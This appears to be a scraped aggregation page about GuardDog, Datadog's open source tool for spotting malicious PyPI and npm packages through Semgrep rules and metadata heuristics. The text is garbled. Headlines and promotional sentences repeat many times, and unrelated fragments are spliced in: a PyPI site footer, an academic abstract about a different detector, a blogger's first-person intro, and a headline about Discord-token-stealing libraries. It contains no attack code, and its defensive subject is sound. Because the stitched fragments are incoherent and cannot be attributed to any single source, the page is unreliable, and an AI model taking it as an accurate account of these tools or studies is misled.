Finding Malicious Pypi Packages Through Static Code Analysis Meet Guarddog Datadog Security Labs

Investigating A Backdoored PyPi Package Targeting FastAPI Applications | Datadog Security Labs

Investigating A Backdoored PyPi Package Targeting FastAPI Applications | Datadog Security Labs Today, we’re excited to release guarddog, a new open source project that helps identify malicious python packages using semgrep and package metadata analysis. in software supply chain attacks, threat actors target various points in the build, packaging, and deployment process. Guarddog is a cli tool that allows to identify malicious pypi and npm packages, go modules, github actions, or vscode extensions. it runs a set of heuristics on the package source code (through semgrep rules) and on the package metadata.

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs 2025 python packaging survey is now live! take the survey now. developed and maintained by the python community, for the python community. donate today! "pypi", "python package index", and the blocks logos are registered trademarks of the python software foundation. Guarddog is new open source tool aimed at identifying malicious python packages using sempreg and package metadata analysis. thanks to a set of source code heuristics, guarddog can. Malicious software packages in open source ecosystems, such as pypi, pose growing security risks. unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, making detection challenging due to evolving attack methods and the lack of structured datasets. Guarddog is a cli tool that allows to identify malicious pypi and npm packages. it runs a set of heuristics on the package source code (through semgrep rules) and on the package metadata. guarddog can be used to scan local or remote pypi and npm packages using any of the available heuristics.

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs Malicious software packages in open source ecosystems, such as pypi, pose growing security risks. unlike traditional vulnerabilities, these packages are intentionally designed to deceive users, making detection challenging due to evolving attack methods and the lack of structured datasets. Guarddog is a cli tool that allows to identify malicious pypi and npm packages. it runs a set of heuristics on the package source code (through semgrep rules) and on the package metadata. guarddog can be used to scan local or remote pypi and npm packages using any of the available heuristics. Today, we're excited to release guarddog, a new open source project that helps identify malicious python packages using semgrep and package metadata analysis. in software supply chain attacks, threat actors target various points in the build, packaging, and deployment process. Guarddog is an open source project at datadog for identifying malicious pypi and npm packages. using guarddog’s one two punch of package metadata scanning and semgrep powered code behavior analysis, you can make sure your python and javascript code remains free of malicious dependencies. Addressing these limitations, we present pypiguard, an advanced hybrid ensemble meta model for malicious package detection that integrates both static metadata and dynamic application programming interface (api) call behaviors, enhancing detection accuracy and reducing error rates. I wanted to explore this further, so in this post i’m going to walk through how i installed and analyzed every package in pypi looking for malicious activity.

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs Today, we're excited to release guarddog, a new open source project that helps identify malicious python packages using semgrep and package metadata analysis. in software supply chain attacks, threat actors target various points in the build, packaging, and deployment process. Guarddog is an open source project at datadog for identifying malicious pypi and npm packages. using guarddog’s one two punch of package metadata scanning and semgrep powered code behavior analysis, you can make sure your python and javascript code remains free of malicious dependencies. Addressing these limitations, we present pypiguard, an advanced hybrid ensemble meta model for malicious package detection that integrates both static metadata and dynamic application programming interface (api) call behaviors, enhancing detection accuracy and reducing error rates. I wanted to explore this further, so in this post i’m going to walk through how i installed and analyzed every package in pypi looking for malicious activity.

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs Addressing these limitations, we present pypiguard, an advanced hybrid ensemble meta model for malicious package detection that integrates both static metadata and dynamic application programming interface (api) call behaviors, enhancing detection accuracy and reducing error rates. I wanted to explore this further, so in this post i’m going to walk through how i installed and analyzed every package in pypi looking for malicious activity.

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

Finding Malicious PyPI Packages Through Static Code Analysis: Meet GuardDog | Datadog Security Labs

11 Malicious PyPI Python Libraries Stealing Discord Tokens and Installing Shells | Cybersecurity